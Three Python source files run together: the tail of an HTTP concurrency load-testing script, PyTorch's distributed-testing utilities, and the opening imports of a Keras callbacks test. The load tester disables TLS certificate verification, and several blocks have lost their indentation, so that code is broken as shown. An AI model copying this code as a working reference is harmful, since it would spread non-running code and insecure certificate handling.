            lock.acquire()
            print("Failed to send Authentication Request. Failure Response:")
            traceback.print_exc()
            # BUG FIX: was `lock.relase()` — an AttributeError that masked the
            # original failure and left the lock held.
            lock.release()
            sys.exit()
        if r.status_code in [200, 201]:
            cookies = dict(r.cookies)
            safe_print("Authentication Succeeded\n\tSession Cookie: %s" % (dict(cookies)), lock)
            if sum(1 for _ in r.cookies) == 0:
                safe_print("\t\033[91mWarning:\033[0m Received 2XX status from server, but no Session Cookie was readable. You're probably NOT authenticated", lock)
        else:
            safe_print("Authentication Failure:\n\tStatus: %s\n\tResponse: %s" %(status(r.status_code), r.text), lock)
            sys.exit()
    else:
        cookies = {}
    # After authentication, traverse through each page
    try:
        for page in url_details['endpoints']:
            current_url = "%s://%s/%s" %(url_details['protocol'], url_details['url'], page)
            try:
                r = requests.request( 'get',
                                      url=current_url,
                                      cookies=cookies,
                                      verify=False,
                                      allow_redirects=True,
                                      timeout=(timeout['connect'], timeout['read']))
                times.append(r.elapsed.microseconds)
                results["Valid Response"] += 1
            except requests.exceptions.ReadTimeout as e:
                safe_print("Request Thread %s:\n\t\033[91mRead Timeout!\033[0m No server response in %s seconds" %(number, timeout['read']), lock)
                results["Read Timeout"] += 1
                return
            except requests.exceptions.ConnectTimeout as e:
                # safe_print already serializes; no extra locking needed here.
                safe_print("Request Thread %s:\n\t\033[91mConnect Timeout!\033[0m No server response in %s seconds" %(number, timeout['connect']), lock)
                results["Connect Timeout"] += 1
                return
            except requests.exceptions.ConnectionError as e:
                safe_print("Request Thread %s:\n\t\033[91mConnection Error!\033[0m %s" %(number, e), lock)
                results["Connection Error"] += 1
                return
            except Exception as e:
                safe_print("Request Thread %s:\n\t\033[91mUnexpected Error!\033[0m %s" %(number, e), lock)
                return
            if not r.status_code == 200:
                safe_print("Failed to get page:\n\tURL: %s\n\tStatus: %s" %(current_url, status(r.status_code)), lock)
            else:
                if r.history:
                    # Report each redirect hop before the final destination.
                    for redirect in r.history:
                        safe_print("Request Thread %s:\n\tStatus: %s\n\tTime: %s\n\tRedirects:\n\t\t%s : %s" %( number, status(r.status_code), float(r.elapsed.microseconds) / 1000000,
                                                                                                               status(redirect.status_code), redirect.url),
                                   lock)
                    safe_print("\tFinal Destination:\n\t\t%s : %s" %(status(r.status_code), r.url), lock)
                else:
                    safe_print("Request Thread %s:\n\tURL: %s\n\tStatus: %s\n\tTime: %s" %(number, r.url, status(r.status_code), float(r.elapsed.microseconds) / 1000000), lock)
    except KeyboardInterrupt:
        sys.exit()
if __name__ == "__main__":
# Disable all SSL warnings
try:
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
except:
pass
# Catch Sigterm from User
signal.signal(signal.SIGTERM, signal_term_handler)
# Globals
subprocesses = []
count = 0
manager = Manager()
lock = manager.Lock()
times = manager.list()
results = manager.dict()
results["Valid Response"] = 0
results["Connection Error"] = 0
results["Read Timeout"] = 0
results["Connect Timeout"] = 0
# Import list of URLs:
# protocol, base url, and list of endpoints
with open('config/url_list.json', 'r') as url_endpoints:
url_details = json.load(url_endpoints)
# Import Authentication Details:
# username, password, url, request type and url endpoint
with open('config/authentication.json', 'r') as login_params:
authentication = json.load(login_params)
# Parse User Command Line Arguments
parser = argparse.ArgumentParser(description='Spawn multiple HTTP request threads to request specified URL.')
parser.add_argument("--concurrency", dest="concurrency", type=int, default=1, required=False, help='number of users simultaneously requesting pages (ex. --concurrency 15)')
args = parser.parse_args()
user_args = vars(args)
# Configurable Parameter Defaults
concurrency = user_args['concurrency']
timeout = {"read": 5, "connect": 5}
# Send Parallel URL Requests
# Note: Number of worker processes is bound by host
# Too many subprocesses yields OSOSError: [Errno 35] Resource temporarily unavailable
# This should be configurable on your OS
print("\nSpawning: \n\t%s subprocesses for %s simultaneous requests of page" %(concurrency, concurrency))
# Spawn a process for every request instance
for x in range(0,concurrency):
count += 1
p = Process(target=send_http_request, args=(results, times, url_details, authentication, timeout, lock, count,))
subprocesses.append(p)
p.start()
# Wait for all processes to complete
for subprocess in subprocesses:
subprocess.join()
# Calculate average response time
# Average Time in seconds
avg_time = "N/A"
if len(times) > 0:
avg_time = float(sum(times)/len(times))/1000000
# Print Results to Console
# JW: TODO clean these up so they don't throw exceptions for empty data setsg
print("\nAll Requests Sent:")
print("\tValid Response: %s" %(results["Valid Response"]))
print("\tConnection Error: %s" %(results["Connection Error"]))
print("\tRead Timeout: %s" %(results["Read Timeout"]))
print("\tConnect Timeout: %s\n" %(results["Connect Timeout"]))
print("Average Response Time:\n\t%s seconds" %(str(avg_time)))
print("Minimum Response Time:\n\t%s seconds" %(str(float(min(times))/1000000)))
print("Maximum Response Time:\n\t%s seconds" %(str(float(max(times))/1000000)))
print("Median Response Time:\n\t%s seconds" %(np.median(times)/1000000))
print("Standard Deviation:\n\t%s seconds\n" %(np.std(times)/1000000))
|
common_distributed.py | # From PyTorch:
#
# Copyright (c) 2016- Facebook, Inc (Adam Paszke)
# Copyright (c) 2014- Facebook, Inc (Soumith Chintala)
# Copyright (c) 2011-2014 Idiap Research Institute (Ronan Collobert)
# Copyright (c) 2012-2014 Deepmind Technologies (Koray Kavukcuoglu)
# Copyright (c) 2011-2012 NEC Laboratories America (Koray Kavukcuoglu)
# Copyright (c) 2011-2013 NYU (Clement Farabet)
# Copyright (c) 2006-2010 NEC Laboratories America (Ronan Collobert, Leon Bottou, Iain Melvin, Jason Weston)
# Copyright (c) 2006 Idiap Research Institute (Samy Bengio)
# Copyright (c) 2001-2004 Idiap Research Institute (Ronan Collobert, Samy Bengio, Johnny Mariethoz)
#
# From Caffe2:
#
# Copyright (c) 2016-present, Facebook Inc. All rights reserved.
#
# All contributions by Facebook:
# Copyright (c) 2016 Facebook Inc.
#
# All contributions by Google:
# Copyright (c) 2015 Google Inc.
# All rights reserved.
#
# All contributions by Yangqing Jia:
# Copyright (c) 2015 Yangqing Jia
# All rights reserved.
#
# All contributions by Kakao Brain:
# Copyright 2019-2020 Kakao Brain
#
# All contributions from Caffe:
# Copyright(c) 2013, 2014, 2015, the respective contributors
# All rights reserved.
#
# All other contributions:
# Copyright(c) 2015, 2016 the respective contributors
# All rights reserved.
#
# Caffe2 uses a copyright model similar to Caffe: each contributor holds
# copyright over their contributions to Caffe2. The project versioning records
# all such contribution and copyright details. If a contributor wants to further
# mark their specific copyright on a particular contribution, they should
# indicate their copyright solely in the commit message of the change when it is
# committed.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the names of Facebook, Deepmind Technologies, NYU, NEC Laboratories America
# and IDIAP Research Institute nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# This file is copied from https://github.com/pytorch/pytorch/tree/v1.9.0/torch/testing/_internal/common_distributed.py
# flake8: noqa
from contextlib import contextmanager
from datetime import timedelta
from enum import Enum
import faulthandler
from multiprocessing import Manager
from io import StringIO
import os
import sys
import tempfile
import threading
import time
import unittest
import logging
import traceback
import types
from typing import NamedTuple, Optional, Union
from functools import wraps
import torch
import torch.distributed as c10d
import torch.cuda.nccl
from functools import partial, reduce
from tests.internal.torch.common_utils import (
TestCase,
TEST_WITH_ROCM,
FILE_SCHEMA,
find_free_port,
retry_on_connect_failures,
)
logger = logging.getLogger(__name__)
class TestSkip(NamedTuple):
    """A skip condition: the subprocess exit code that signals it, plus a
    human-readable reason."""
    exit_code: int  # process exit code used to communicate this skip
    message: str  # reason shown when the skip is reported
# Registry of known skip conditions, keyed by name. Worker processes exit
# with the corresponding exit_code to tell the parent why they skipped.
TEST_SKIPS = {
    "backend_unavailable": TestSkip(
        72, "Skipped because distributed backend is not available."
    ),
    "small_worldsize": TestSkip(73, "Skipped due to small world size."),
    "no_cuda": TestSkip(74, "CUDA is not available."),
    "multi-gpu": TestSkip(75, "Need at least 2 CUDA devices"),
    "nccl": TestSkip(76, "c10d not compiled with NCCL support"),
    "skipIfRocm": TestSkip(78, "Test skipped for ROCm"),
    "no_peer_access": TestSkip(79, "Test skipped because no GPU peer access"),
}
def skip_if_no_gpu(func):
    """Nccl multigpu tests require at least 2 GPUS. Skip if this is not met"""
    @wraps(func)
    def wrapper(*args, **kwargs):
        if not torch.cuda.is_available():
            sys.exit(TEST_SKIPS["no_cuda"].exit_code)
        required = os.environ["WORLD_SIZE"]
        if torch.cuda.device_count() < int(required):
            # Record the precise requirement before signalling the skip.
            TEST_SKIPS["multi-gpu"] = TestSkip(75, "Need at least {} CUDA devices".format(required))
            sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
        return func(*args, **kwargs)
    return wrapper
def skip_if_small_worldsize(func):
    """Skip when running a non-MPI backend with a world size of 2 or fewer."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        backend = os.environ["BACKEND"]
        # WORLD_SIZE is only consulted for non-MPI backends (short-circuit).
        if backend != "mpi" and int(os.environ["WORLD_SIZE"]) <= 2:
            sys.exit(TEST_SKIPS["small_worldsize"].exit_code)
        return func(*args, **kwargs)
    return wrapper
def require_n_gpus_for_nccl_backend(n, backend):
    """Skip the wrapped test unless the NCCL backend has *n* CUDA devices;
    non-NCCL backends run unconditionally."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            # device_count() is only queried for the nccl backend
            # (short-circuit), matching the original evaluation order.
            if backend != "nccl" or torch.cuda.device_count() >= n:
                return func(*args, **kwargs)
            TEST_SKIPS["multi-gpu"] = TestSkip(75, "Need at least {} CUDA devices".format(n))
            sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
        return wrapper
    return decorator
def skip_if_lt_x_gpu(x):
    """Skip the wrapped test unless at least *x* CUDA devices are available."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            enough = torch.cuda.is_available() and torch.cuda.device_count() >= x
            if not enough:
                TEST_SKIPS["multi-gpu"] = TestSkip(75, "Need at least {} CUDA devices".format(x))
                sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
            return func(*args, **kwargs)
        return wrapper
    return decorator
# This decorator helps avoiding initializing cuda while testing other backends
def nccl_skip_if_lt_x_gpu(backend, x):
    """Like skip_if_lt_x_gpu, but never touches CUDA unless *backend* is
    "nccl" (so other backends don't trigger CUDA initialization)."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            needs_gpus = backend == "nccl"
            if needs_gpus and not (torch.cuda.is_available() and torch.cuda.device_count() >= x):
                TEST_SKIPS["multi-gpu"] = TestSkip(75, "Need at least {} CUDA devices".format(x))
                sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
            return func(*args, **kwargs)
        return wrapper
    return decorator
def with_nccl_blocking_wait(func):
    """
    Convenience decorator to set/unset NCCL_BLOCKING_WAIT flag. Note that use of
    this decorator will override the setting of NCCL_ASYNC_ERROR_HANDLING for
    the particular test. After the test, both NCCL_BLOCKING_WAIT and
    NCCL_ASYNC_ERROR_HANDLING will be restored to their original values.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        # Save and unset NCCL_ASYNC_ERROR_HANDLING (it conflicts with
        # blocking-wait mode); None means it was not set.
        cached_nccl_async_error_handling: Union[str, None] = os.environ.pop(
            "NCCL_ASYNC_ERROR_HANDLING", None
        )
        # Save the previous value of NCCL_BLOCKING_WAIT (None if unset) and
        # force it on for the duration of the test.
        cached_nccl_blocking_wait: Union[str, None] = os.environ.get(
            "NCCL_BLOCKING_WAIT"
        )
        os.environ["NCCL_BLOCKING_WAIT"] = "1"
        try:
            return func(*args, **kwargs)
        finally:
            # Restore both variables to their pre-call state.
            if cached_nccl_async_error_handling is not None:
                os.environ[
                    "NCCL_ASYNC_ERROR_HANDLING"
                ] = cached_nccl_async_error_handling
            if cached_nccl_blocking_wait is not None:
                os.environ["NCCL_BLOCKING_WAIT"] = cached_nccl_blocking_wait
            else:
                # BUG FIX: previously NCCL_BLOCKING_WAIT was left set to "1"
                # when it had not been set before the call, contradicting the
                # docstring's restoration guarantee.
                del os.environ["NCCL_BLOCKING_WAIT"]
    return wrapper
def with_dist_debug_levels(levels):
    """
    Runs a test for each distributed debug level specified in levels.
    """
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            previous = os.environ.get("TORCH_DISTRIBUTED_DEBUG", None)
            for level in levels:
                os.environ["TORCH_DISTRIBUTED_DEBUG"] = level
                ret = func(*args, **kwargs)
            if previous is not None:
                os.environ["TORCH_DISTRIBUTED_DEBUG"] = previous
            # Only the last run's value is returned; since these are
            # unittests, earlier failures would already have raised.
            return ret
        return wrapper
    return decorator
def requires_gloo():
    """Decorator factory: skip the test unless c10d was built with Gloo."""
    gloo_ok = c10d.is_gloo_available()
    return unittest.skipUnless(gloo_ok, "c10d was not compiled with the Gloo backend")
def requires_nccl_version(version, msg):
    """Decorator factory: skip unless NCCL is available at *version* or
    newer; *msg* explains why the version is required."""
    # Guard clause: without NCCL at all, skip unconditionally.
    if not c10d.is_nccl_available():
        return unittest.skip(
            "c10d was not compiled with the NCCL backend",
        )
    found = torch.cuda.nccl.version()
    return unittest.skipIf(
        found < version,
        "Requires NCCL version greater than or equal to: {}, found: {}, reason: {}".format(
            version, found, msg
        ),
    )
def requires_nccl():
    """Decorator factory: skip the test unless c10d was built with NCCL."""
    nccl_ok = c10d.is_nccl_available()
    return unittest.skipUnless(nccl_ok, "c10d was not compiled with the NCCL backend")
def requires_mpi():
    """Decorator factory: skip the test unless c10d was built with MPI."""
    mpi_ok = c10d.is_mpi_available()
    return unittest.skipUnless(mpi_ok, "c10d was not compiled with the MPI backend")
def skip_if_rocm_single_process(func):
    """Skips a test for ROCm in a single process environment"""
    # Flag consumed elsewhere by ROCm-aware test infrastructure.
    func.skip_if_rocm = True

    @wraps(func)
    def wrapper(*args, **kwargs):
        if TEST_WITH_ROCM:
            raise unittest.SkipTest("Test skipped for ROCm")
        return func(*args, **kwargs)
    return wrapper
def skip_if_rocm(func):
    """Skips a test for ROCm"""
    # Flag consumed elsewhere by ROCm-aware test infrastructure.
    func.skip_if_rocm = True

    @wraps(func)
    def wrapper(*args, **kwargs):
        if TEST_WITH_ROCM:
            # Multi-process variant: signal the skip via exit code.
            sys.exit(TEST_SKIPS["skipIfRocm"].exit_code)
        return func(*args, **kwargs)
    return wrapper
def skip_if_win32():
    """Decorator factory: skip the test when running on Windows."""
    return unittest.skipIf(
        sys.platform == "win32",
        # Typo fix in the skip reason: "supportted" -> "supported".
        "This unit test case is not supported on Windows platform",
    )
@retry_on_connect_failures
def create_tcp_store(
    addr="localhost",
    world_size=1,
    is_master=True,
    timeout=timedelta(minutes=5),
    wait_for_workers=True,
    jit_class=False,
):
    """
    Creates a TCP store. Retries if the chosen port is already in use.
    """
    port = find_free_port()
    if not jit_class:
        return c10d.TCPStore(
            addr, port, world_size, is_master, wait_for_workers=wait_for_workers
        )
    # The TorchScript class variant takes its timeout in milliseconds.
    timeout_millisecond = int(timeout / timedelta(milliseconds=1))
    return torch.classes.dist_c10d.TCPStore(
        addr, port, world_size, is_master, timeout_millisecond
    )
# Per-test timeout in seconds: the default, plus per-test-name overrides
# consumed by get_timeout() below.
TIMEOUT_DEFAULT = 100
TIMEOUT_OVERRIDE = {"test_ddp_uneven_inputs": 400}
def create_device(interface=None):
    """Create a Gloo device; bind to the named *interface* when given,
    otherwise (and always on Windows) bind to loopback."""
    if sys.platform != "win32" and interface is not None:
        return c10d.ProcessGroupGloo.create_device(interface=interface)
    return c10d.ProcessGroupGloo.create_device(hostname="127.0.0.1")
def get_timeout(test_id) -> int:
    """Look up the timeout (seconds) for a test, keyed by its bare method
    name (the last dotted component of *test_id*)."""
    name = test_id.split(".")[-1]
    return TIMEOUT_OVERRIDE.get(name, TIMEOUT_DEFAULT)
@contextmanager
def captured_output():
    """Temporarily swap sys.stdout/sys.stderr for StringIO buffers, yielding
    them as a (stdout, stderr) pair; the real streams are restored on exit."""
    saved = (sys.stdout, sys.stderr)
    sys.stdout, sys.stderr = StringIO(), StringIO()
    try:
        yield sys.stdout, sys.stderr
    finally:
        sys.stdout, sys.stderr = saved
def simple_sparse_reduce_tests(rank: int, world_size: int, num_inputs: int = 1):
    """
    Generate a number of basic test cases for sparse reduction.
    These cover tensors with a varying number of sparse dimensions and a varying
    number of dense dimensions. The only reduction operation we support is sum.
    """
    def generate(rank: int, world_size: int, sparse_dims: int = 1, dense_dims: int = 0):
        # First sparse dimension is [0..rank].
        # Subsequent dimensions are always 0, so we know there is
        # a non-empty intersection between any two sparse tensors.
        indices = torch.reshape(torch.arange(rank + 1), (1, rank + 1))
        shape = [world_size] + [2 for _ in range(dense_dims)]
        for _ in range(sparse_dims - 1):
            indices = torch.cat((indices, torch.zeros(1, rank + 1)))
            shape.append(world_size)
        values = torch.ones([rank + 1] + [2 for _ in range(dense_dims)])
        return torch.sparse_coo_tensor(indices, values, shape)
    def compute_sum(fn, world_size: int):
        # Expected all-reduce(sum) result: the sum of every rank's input.
        return reduce(
            lambda a, b: a + b, [fn(rank, world_size) for rank in range(world_size)]
        )
    # One (inputs-for-this-rank, expected-outputs) pair per generator
    # configuration below.
    return [
        (
            [
                fn(num_inputs * rank + i, num_inputs * world_size)
                for i in range(num_inputs)
            ],
            [compute_sum(fn, num_inputs * world_size) for i in range(num_inputs)],
        )
        for fn in [
            partial(generate, sparse_dims=1),
            partial(generate, sparse_dims=2),
            partial(generate, sparse_dims=3),
            partial(generate, dense_dims=1),
            partial(generate, dense_dims=2),
            partial(generate, dense_dims=3),
        ]
    ]
# Module-level handle to the scratch directory so cleanup_temp_dir can find it.
tmp_dir: Optional[tempfile.TemporaryDirectory] = None
def initialize_temp_directories(init_method: Optional[str] = None) -> None:
    """Create the shared scratch layout (barrier/, test_dir/, init_dir/) and
    export TEMP_DIR / INIT_METHOD for the test subprocesses."""
    global tmp_dir
    tmp_dir = tempfile.TemporaryDirectory()
    base = tmp_dir.name
    os.environ["TEMP_DIR"] = base
    for sub in ("barrier", "test_dir", "init_dir"):
        os.mkdir(os.path.join(base, sub))
    init_dir_path = os.path.join(base, "init_dir")
    # Prefer an explicit init method; otherwise rendezvous through a shared
    # file inside the scratch area.
    if init_method is None:
        os.environ["INIT_METHOD"] = FILE_SCHEMA + os.path.join(
            init_dir_path, "shared_init_file"
        )
    else:
        os.environ["INIT_METHOD"] = init_method
def cleanup_temp_dir() -> None:
    """Tear down the scratch directory made by initialize_temp_directories."""
    if tmp_dir is None:
        return
    tmp_dir.cleanup()
# [How does MultiProcessTestCase work?]
# Each MultiProcessTestCase instance uses 1 + `world_size()` processes, by
# default `world_size()` returns 4. Let's take `test_rpc_spawn.py` as an
# example which inherits from this class. Its `Setup()` methods calls into
# `MultiProcessTestCase._spawn_processes()` which spawns `world_size()`
# subprocesses. During the spawn, the main process passes the test name to
# subprocesses, and the name is acquired from self.id(). The subprocesses
# then use the provided test function name to retrieve the function attribute
# from the test instance and run it. The main process simply waits for all
# subprocesses to join.
class MultiProcessTestCase(TestCase):
MAIN_PROCESS_RANK = -1
# This exit code is used to indicate that the test code had an error and
# exited abnormally. There are certain tests that might use sys.exit() to
# simulate failures and in those cases, we can't have an exit code of 0,
# but we still want to ensure we didn't run into any other errors.
TEST_ERROR_EXIT_CODE = 10
    # do not early terminate for distributed tests.
    def _should_stop_test_suite(self) -> bool:
        """Never abort the suite early; distributed failures are per-test."""
        return False
    @property
    def world_size(self) -> int:
        # Number of worker processes to spawn; subclasses may override.
        return 4
def join_or_run(self, fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MAIN_PROCESS_RANK:
self._join_processes(fn)
else:
fn()
return types.MethodType(wrapper, self)
# The main process spawns N subprocesses that run the test.
# Constructor patches current instance test method to
# assume the role of the main process and join its subprocesses,
# or run the underlying test function.
def __init__(self, method_name: str = "runTest") -> None:
super().__init__(method_name)
fn = getattr(self, method_name)
setattr(self, method_name, self.join_or_run(fn))
    def setUp(self) -> None:
        """Reset per-test state: empty process table, main-process rank, a
        fresh rendezvous file, and a snapshot of TEST_SKIPS for restoration."""
        super().setUp()
        self.skip_return_code_checks = [] # type: ignore[var-annotated]
        self.processes = [] # type: ignore[var-annotated]
        self.rank = self.MAIN_PROCESS_RANK
        # File used by file:// init methods for subprocess rendezvous.
        self.file_name = tempfile.NamedTemporaryFile(delete=False).name
        global TEST_SKIPS
        # Snapshot so per-test mutations of TEST_SKIPS can be undone later.
        self.old_test_skips = TEST_SKIPS.copy()
        # pid to pipe consisting of error message from process.
        self.pid_to_pipe = {} # type: ignore[var-annotated]
    def tearDown(self) -> None:
        """Terminate any still-running workers and drop references to them."""
        super().tearDown()
        for p in self.processes:
            p.terminate()
        # Each Process instance holds a few open file descriptors. The unittest
        # runner creates a new TestCase instance for each test method and keeps
        # it alive until the end of the entire suite. We must thus reset the
        # processes to prevent an effective file descriptor leak.
        self.processes = []
def _current_test_name(self) -> str:
# self.id() == e.g. '__main__.TestDistributed.TestAdditive.test_get_rank'
return self.id().split(".")[-1]
def _start_processes(self, proc) -> None:
test_skips_manager = Manager()
test_skips = test_skips_manager.dict()
global TEST_SKIPS
test_skips.update(TEST_SKIPS)
TEST_SKIPS = test_skips
self.processes = []
for rank in range(int(self.world_size)):
parent_conn, child_conn = torch.multiprocessing.Pipe()
process = proc(
target=self.__class__._run,
name="process " + str(rank),
args=(rank, self._current_test_name(), self.file_name, child_conn),
)
process.start()
logger.info(f"Started process {rank} with pid {process.pid}")
self.pid_to_pipe[process.pid] = parent_conn
self.processes.append(process)
def _fork_processes(self) -> None:
proc = torch.multiprocessing.get_context("fork").Process
self._start_processes(proc)
def _spawn_processes(self) -> None:
proc = torch.multiprocessing.get_context("spawn").Process
self._start_processes(proc)
class Event(Enum):
GET_TRACEBACK = 1
@staticmethod
def _event_listener(pipe, rank: int):
logger.info(f"Starting event listener thread for {rank}")
while True:
if pipe.poll(None):
if pipe.closed:
logger.info(
f"Pipe closed for process {rank}, stopping event listener thread"
)
return
event = pipe.recv()
logger.info(f"Received event {event} on process {rank}")
if event == MultiProcessTestCase.Event.GET_TRACEBACK:
# Return traceback to the parent process.
with tempfile.NamedTemporaryFile(mode="r+") as tmp_file:
faulthandler.dump_traceback(tmp_file)
# Flush buffers and seek to read from the beginning
tmp_file.flush()
tmp_file.seek(0)
pipe.send(tmp_file.read())
logger.info(f"Process {rank} sent traceback")
@classmethod
def _run(cls, rank: int, test_name: str, file_name: str, pipe) -> None:
self = cls(test_name)
# Start event listener thread.
threading.Thread(
target=MultiProcessTestCase._event_listener, args=(pipe, rank), daemon=True
).start()
self.rank = rank
self.file_name = file_name
self.run_test(test_name, pipe)
# exit to avoid run teardown() for fork processes
sys.exit(0)
def run_test(self, test_name: str, pipe) -> None:
if sys.platform != "win32" and sys.platform != "darwin":
# Register signal handler to dump stack traces on FATALs.
# Windows and MacOS do not support the signal handlers.
torch._C._set_print_stack_traces_on_fatal_signal(True) # type: ignore[attr-defined]
# self.id() == e.g. '__main__.TestDistributed.test_get_rank'
# We're retrieving a corresponding test and executing it.
try:
getattr(self, test_name)()
# Close pipe after done with test.
pipe.close()
except Exception as e:
logger.error(
f"Caught exception: \n{traceback.format_exc()} exiting "
"process with exit code: {MultiProcessTestCase.TEST_ERROR_EXIT_CODE}"
)
# Send error to parent process.
pipe.send(traceback.format_exc())
pipe.close()
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _get_timedout_process_traceback(self) -> None:
pipes = []
for i, process in enumerate(self.processes):
if process.exitcode is None:
pipe = self.pid_to_pipe[process.pid]
try:
pipe.send(MultiProcessTestCase.Event.GET_TRACEBACK)
pipes.append((i, pipe))
except BrokenPipeError as e:
logger.error(
f"Encountered error while trying to get traceback for process {i}: {e}"
)
# Wait for results.
for rank, pipe in pipes:
# Wait for traceback
if pipe.poll(5):
if pipe.closed:
logger.info(
f"Pipe closed for process {rank}, cannot retrieve traceback"
)
continue
traceback = pipe.recv()
logger.error(
f"Process {rank} timed out with traceback: \n\n{traceback}"
)
else:
logger.error(
f"Could not retrieve traceback for timed out process: {rank}"
)
def _join_processes(self, fn) -> None:
timeout = get_timeout(self.id())
start_time = time.time()
subprocess_error = False
try:
while True:
# check to see if any subprocess exited with an error early.
for (i, p) in enumerate(self.processes):
# This is the exit code processes exit with if they
# encountered an exception.
if p.exitcode == MultiProcessTestCase.TEST_ERROR_EXIT_CODE:
print(
f"Process {i} terminated with exit code {p.exitcode}, terminating remaining processes."
)
active_children = torch.multiprocessing.active_children()
for ac in active_children:
ac.terminate()
subprocess_error = True
break
if subprocess_error:
break
# All processes have joined cleanly if they all a valid exitcode
if all([p.exitcode is not None for p in self.processes]):
break
# Check if we should time out the test. If so, we terminate each process.
elapsed = time.time() - start_time
if elapsed > timeout:
self._get_timedout_process_traceback()
print(
f"Timing out after {timeout} seconds and killing subprocesses."
)
for p in self.processes:
p.terminate()
break
# Sleep to avoid excessive busy polling.
time.sleep(0.1)
elapsed_time = time.time() - start_time
if fn in self.skip_return_code_checks:
self._check_no_test_errors(elapsed_time)
else:
self._check_return_codes(elapsed_time)
finally:
# Close all pipes
for pid, pipe in self.pid_to_pipe.items():
pipe.close()
global TEST_SKIPS
TEST_SKIPS = self.old_test_skips
def _check_no_test_errors(self, elapsed_time) -> None:
"""
Checks that we didn't have any errors thrown in the child processes.
"""
for i, p in enumerate(self.processes):
if p.exitcode is None:
raise RuntimeError(
"Process {} timed out after {} seconds".format(i, elapsed_time)
)
self.assertNotEqual(self.TEST_ERROR_EXIT_CODE, p.exitcode)
def _check_return_codes(self, elapsed_time) -> None:
"""
Checks that the return codes of all spawned processes match, and skips
tests if they returned a return code indicating a skipping condition.
"""
first_process = self.processes[0]
# first, we check if there are errors in actual processes
# (via TEST_ERROR_EXIT CODE), and raise an exception for those.
# the reason we do this is to attempt to raise a more helpful error
# message than "Process x terminated/timed out"
# TODO: we should pipe the exception of the failed subprocess here.
# Currently, the actual exception is displayed as a logging output.
errored_processes = [
(i, p)
for i, p in enumerate(self.processes)
if p.exitcode == MultiProcessTestCase.TEST_ERROR_EXIT_CODE
]
if errored_processes:
error = ""
for i, process in errored_processes:
# Get error from pipe.
error_message = self.pid_to_pipe[process.pid].recv()
error += (
"Process {} exited with error code {} and exception:\n{}\n".format(
i, MultiProcessTestCase.TEST_ERROR_EXIT_CODE, error_message
)
)
raise RuntimeError(error)
# If no process exited uncleanly, we check for timeouts, and then ensure
# each process exited cleanly.
for i, p in enumerate(self.processes):
if p.exitcode is None:
raise RuntimeError(
"Process {} terminated or timed out after {} seconds".format(
i, elapsed_time
)
)
self.assertEqual(
p.exitcode,
first_process.exitcode,
msg="Expect process {} exit code to match Process 0 exit code of {}, but got {}".format(
i, first_process.exitcode, p.exitcode
),
)
for skip in TEST_SKIPS.values():
if first_process.exitcode == skip.exit_code:
raise unittest.SkipTest(skip.message)
self.assertEqual(
first_process.exitcode,
0,
msg="Expected zero exit code but got {}".format(first_process.exitcode),
)
@property
def is_master(self) -> bool:
return self.rank == 0
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
